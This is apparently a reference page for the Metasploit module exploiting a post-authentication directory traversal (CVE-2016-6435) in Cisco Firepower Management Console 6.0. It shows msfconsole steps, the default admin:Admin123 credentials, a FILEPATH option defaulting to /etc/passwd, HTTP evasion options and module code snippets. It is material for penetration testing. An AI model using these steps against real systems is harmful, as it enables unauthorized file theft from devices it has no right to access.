Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/cisco_firepower_download metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal
Module: auxiliary/scanner/http/cisco_firepower_download
Source code: modules/auxiliary/scanner/http/cisco_firepower_download.rb
Disclosure date: 2016-10-10
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2016-6435

This module exploits a directory traversal vulnerability in Cisco Firepower Management under the context of www user. Authentication is required to exploit this vulnerability.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/cisco_firepower_download
msf auxiliary(cisco_firepower_download) > show options
    ... show and set options ...
msf auxiliary(cisco_firepower_download) > set RHOSTS ip-range
msf auxiliary(cisco_firepower_download) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(cisco_firepower_download) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(cisco_firepower_download) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(cisco_firepower_download) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits a vulnerability found in Cisco Firepower Management console. A logged in user can abuse the report viewing feature to download an arbitrary file. Authentication is required to exploit this vulnerability.

This module was written specifically against Cisco Firepower Management 6.0.1 (build 1213) during development. To test, you may download the virtual appliance here:

https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052

Verification Steps


To use this module, first you need to know an username and password. The management console uses admin:Admin123 by default:

  1. Start msfconsole
  2. use auxiliary/scanner/http/cisco_firepower_download
  3. set USERNAME [user]
  4. set PASSWORD [pass]
  5. set RHOSTS [IP]
  6. set FILEPATH [file to download]
  7. run

If the file is found, it will be saved in the loot directory. If not found, the module should print an error indicating so.

Scenarios


cisco_download_demo

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/cisco_firepower_download auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/cisco_firepower_download

msf6 auxiliary(scanner/http/cisco_firepower_download) > show info

       Name: Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal
     Module: auxiliary/scanner/http/cisco_firepower_download
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2016-10-10

Provided by:
  Matt
  sinn3r <[email protected]>

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILEPATH   /etc/passwd      no        The name of the file to download
  PASSWORD   Admin123         yes       Password for Cisco Firepower Management console
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to Cisco Firepower Management console
  THREADS    1                yes       The number of concurrent threads (max one per host)
  USERNAME   admin            yes       Username for Cisco Firepower Management console
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal vulnerability in Cisco 
  Firepower Management under the context of www user. Authentication 
  is required to exploit this vulnerability.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-6435
  https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking

Module Options


This is a complete list of options available in the scanner/http/cisco_firepower_download auxiliary module:

msf6 auxiliary(scanner/http/cisco_firepower_download) > show options

Module options (auxiliary/scanner/http/cisco_firepower_download):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   /etc/passwd      no        The name of the file to download
   PASSWORD   Admin123         yes       Password for Cisco Firepower Management console
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Cisco Firepower Management console
   THREADS    1                yes       The number of concurrent threads (max one per host)
   USERNAME   admin            yes       Username for Cisco Firepower Management console
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/cisco_firepower_download auxiliary module:

msf6 auxiliary(scanner/http/cisco_firepower_download) > show advanced

Module advanced options (auxiliary/scanner/http/cisco_firepower_download):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/cisco_firepower_download module can do:

msf6 auxiliary(scanner/http/cisco_firepower_download) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/cisco_firepower_download auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/cisco_firepower_download) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection timed out while trying to log in.


Here is a relevant code snippet related to the "Connection timed out while trying to log in." error message:

61:	        'target'   => ''
62:	      }
63:	    })
64:	
65:	    unless res
66:	      fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
67:	    end
68:	
69:	    res_cookie = res.get_cookies
70:	    if res.code == 302 && res_cookie.include?('CGISESSID')
71:	      cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first

Here is a relevant code snippet related to the "Unable to obtain the cookie session ID" error message:

144:	
145:	  def run_host(ip)
146:	    cgi_sid = do_login(ip)
147:	
148:	    unless cgi_sid
149:	      fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
150:	    end
151:	
152:	    res = download_file(cgi_sid, datastore['FILEPATH'])
153:	
154:	    if res.nil?

Connection timed out while downloading: <FILEPATH>


Here is a relevant code snippet related to the "Connection timed out while downloading: <FILEPATH>" error message:

150:	    end
151:	
152:	    res = download_file(cgi_sid, datastore['FILEPATH'])
153:	
154:	    if res.nil?
155:	      print_error("Connection timed out while downloading: #{datastore['FILEPATH']}")
156:	    elsif remote_file_exists?(res)
157:	      save_file(res, ip)
158:	    else
159:	      print_error("Remote file not found: #{datastore['FILEPATH']}")
160:	    end

Remote file not found: <FILEPATH>


Here is a relevant code snippet related to the "Remote file not found: <FILEPATH>" error message:

152:	    res = download_file(cgi_sid, datastore['FILEPATH'])
153:	
154:	    if res.nil?
155:	      print_error("Connection timed out while downloading: #{datastore['FILEPATH']}")
156:	    elsif remote_file_exists?(res)
157:	      save_file(res, ip)
158:	    else
159:	      print_error("Remote file not found: #{datastore['FILEPATH']}")
160:	    end
161:	  end
162:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Matt
  • sinn3r

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.